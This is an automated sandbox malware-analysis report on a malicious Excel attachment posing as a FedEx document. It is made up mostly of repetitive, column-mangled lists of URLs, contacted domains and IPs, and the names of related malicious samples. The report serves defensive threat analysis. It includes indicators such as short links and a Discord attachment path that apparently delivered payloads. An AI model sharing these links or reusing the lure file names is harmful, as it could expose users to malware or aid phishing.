      https://tinyurl.com40%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      http://ocsp.comodoca4.com00%URL Reputationsafe
      http://ocsp.comodoca4.com00%URL Reputationsafe
      http://ocsp.comodoca4.com00%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      https://cdn.discordapp.com40%Avira URL Cloudsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      tinyurl.com
      		104.20.138.65
      		truefalse
        		high
        cdn.discordapp.com
        		162.159.129.233
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
            		high
            https://tinyurl.com/y3m5fwhqo.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpfalse
              		high
              https://login.microsoftonline.com/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                		high
                https://shell.suite.office.com:144332F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                  		high
                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                    		high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                      		high
                      https://cdn.entity.32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://api.addins.omex.office.net/appinfo/query32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                        		high
                        https://wus2-000.contentsync.32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://clients.config.office.net/user/v1.0/tenantassociationkey32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                          		high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                            		high
                            https://powerlift.acompli.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://lookup.onenote.com/lookup/geolocation/v132F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                              		high
                              https://cortana.ai32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                		high
                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                  		high
                                  https://cloudfiles.onenote.com/upload.aspx32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                    		high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                      		high
                                      https://entitlement.diagnosticssdf.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                        		high
                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                          		high
                                          https://api.aadrm.com/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://ofcrecsvcapi-int.azurewebsites.net/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cThevc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                            		high
                                            https://api.microsoftstream.com/api/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                              		high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                		high
                                                https://cr.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                  		high
                                                  http://www.galapagosdesign.com/DPleasevc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleasevc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://portal.office.com/account/?ref=ClientMeControl32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameo.exe, 0000000E.00000002.394765913.00000000050D1000.00000004.00000001.sdmp, o.exe, 00000010.00000002.396533915.0000000005451000.00000004.00000001.sdmp, o.exe, 00000011.00000002.421442532.00000000046D1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://ecs.office.com/config/v2/Office32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                        		high
                                                        https://graph.ppe.windows.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                          		high
                                                          https://res.getmicrosoftkey.com/api/redemptionevents32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://powerlift-frontdesk.acompli.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://tasks.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                            		high
                                                            https://officeci.azurewebsites.net/api/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/work32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                              		high
                                                              https://store.office.cn/addinstemplate32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://tinyurl.com4o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://pesterbdd.com/images/Pester.pngo.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://wus2-000.pagecontentsync.32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlo.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                  		high
                                                                  https://globaldisco.crm.dynamics.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                    		high
                                                                    http://ocsp.comodoca4.com0o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                      		high
                                                                      https://store.officeppe.com/addinstemplate32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://dev0-api.acompli.net/autodetect32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://cdn.discordapp.com/attachments/770629131393o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.odwebp.svc.ms32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://api.powerbi.com/v1.0/myorg/groups32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                          		high
                                                                          https://web.microsoftstream.com/video/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                            		high
                                                                            https://graph.windows.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                              		high
                                                                              https://dataservice.o365filtering.com/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://github.com/Pester/Pestero.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://officesetup.getmicrosoftkey.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://analysis.windows.net/powerbi/api32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                  		high
                                                                                  http://www.carterandcone.comlvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://prod-global-autodetect.acompli.net/autodetect32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers/frere-jones.htmlvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://outlook.office365.com/autodiscover/autodiscover.json32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                      		high
                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                        		high
                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                          		high
                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                            		high
                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                              		high
                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                		high
                                                                                                http://weather.service.msn.com/data.aspx32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                  		high
                                                                                                  https://apis.live.net/v5.0/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                    		high
                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                      		high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                        		high
                                                                                                        https://management.azure.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.com/designersGvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://incidents.diagnostics.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                		high
                                                                                                                http://www.fontbureau.com/designers/?vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.founder.com.cn/cn/bThevc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/ios32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                    		high
                                                                                                                    http://www.fontbureau.com/designers?vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                        		high
                                                                                                                        https://o365auditrealtimeingestion.manage.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                          		high
                                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                            		high
                                                                                                                            http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://api.office.net32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                              		high
                                                                                                                              https://incidents.diagnosticssdf.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                		high
                                                                                                                                https://github.com/Pester/Pesterdo.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.tiro.comvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://entitlement.diagnostics.office.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                      		high
                                                                                                                                      http://www.goodfont.co.krvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://autodiscover-s.outlook.com32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://storage.live.com/clientlogs/uploadlocation32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://cdn.discordapp.com4o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.typography.netDvc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown

                                                                                                                                            Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            162.159.129.233
                                                                                                                                            		unknownUnited States
                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                            104.20.138.65
                                                                                                                                            		unknownUnited States
                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                            Analysis ID:320331
                                                                                                                                            Start date:19.11.2020
                                                                                                                                            Start time:09:28:51
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 11m 7s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Sample file name:1099008FEDEX_090887766.xls
                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                            Number of analysed new started processes analysed:37
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal96.troj.expl.evad.winXLS@31/25@2/2
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 2.3% (good quality ratio 1.9%)
                                                                                                                                            • Quality average: 61%
                                                                                                                                            • Quality standard deviation: 35.6%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 90%
                                                                                                                                            • Number of executed functions: 41
                                                                                                                                            • Number of non-executed functions: 25
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                            • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                            • Attach to Office via COM
                                                                                                                                            • Scroll down
                                                                                                                                            • Close Viewer
                                                                                                                                            Warnings:
                                                                                                                                            Show All
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 52.255.188.83, 52.109.76.6, 52.109.88.39, 52.109.8.22, 23.54.113.104, 51.104.139.180, 23.0.174.200, 23.0.174.185, 20.54.26.129, 23.10.249.43, 23.10.249.26
                                                                                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/320331/sample/1099008FEDEX_090887766.xls

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            09:32:32API Interceptor253x Sleep call for process: o.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            162.159.129.233ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                                                                                                                                            • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
                                                                                                                                            104.20.138.651099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                              SIN029088.xlsGet hashmaliciousBrowse
                                                                                                                                                https://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                                                                                                                                  SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                                                                                                                                                    viaseating-666114_xls.HtMlGet hashmaliciousBrowse
                                                                                                                                                      https://tinyurl.com/venmosuppGet hashmaliciousBrowse
                                                                                                                                                        tetratech-907745_xls.HtMlGet hashmaliciousBrowse
                                                                                                                                                          Waybill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                            Waybill Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                              Overdue Payments.xlsGet hashmaliciousBrowse
                                                                                                                                                                ciechgroup-551288_xls.HtMlGet hashmaliciousBrowse
                                                                                                                                                                  OVERDUE INVOICE.xlsGet hashmaliciousBrowse
                                                                                                                                                                    https://tinyurl.com/y5gq29fvGet hashmaliciousBrowse
                                                                                                                                                                      Quote Request October-2020.xlsGet hashmaliciousBrowse
                                                                                                                                                                        https://tinyurl.com/y6484eaqGet hashmaliciousBrowse
                                                                                                                                                                          PROFORMA INVOICE INV-1.xlsGet hashmaliciousBrowse
                                                                                                                                                                            https://naset.ocry.com/#astrid.bulder@rivm.nlGet hashmaliciousBrowse
                                                                                                                                                                              RFQ-SSM-RFQ 6682Q.xlsGet hashmaliciousBrowse
                                                                                                                                                                                https://l.facebook.com/l.php?u=https%3A%2F%2Ftinyurl.com%2Fy3da9xbq%3Ffbclid%3DIwAR11jNtpFJqmHsfB6MuN4oB-gl7-RlVZqSgYIbmZW4ycJwtQ-tC85PzgLO4&h=AT1i9PU8X_itDVqe5yg4Afn5zFPp0KVwni5sQg-Oc5Yor7a-8EWrOl11b-y21X_Oi92_H_jMhPiEjm3aKUnMEib9p96Fuptgd9vraABiOS8AO8X86OxcPZyET7VlHYnKBg&__tn__=H-R&c[0]=AT26jLdBW-b9efDmUD2-IVQDmvnfjC8zMcJVpGrmXtfU07ZmaRqvjC3hcq86tiO8rGqmY2DrakboCaPRMLQtsl2m1yZfExawqplv_zZwazNNYlc2wsoaV6LvzXDEPrWYoMbJFnx7l8Qm7vznPPnkddWEuQGet hashmaliciousBrowse
                                                                                                                                                                                  https://tinyurl.com/yye5b9wxGet hashmaliciousBrowse

                                                                                                                                                                                    Domains

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    cdn.discordapp.com1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    Payment copy.docGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    Order_Request_Retail_20-11691-AB.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7zGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    89BR0suQeS.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
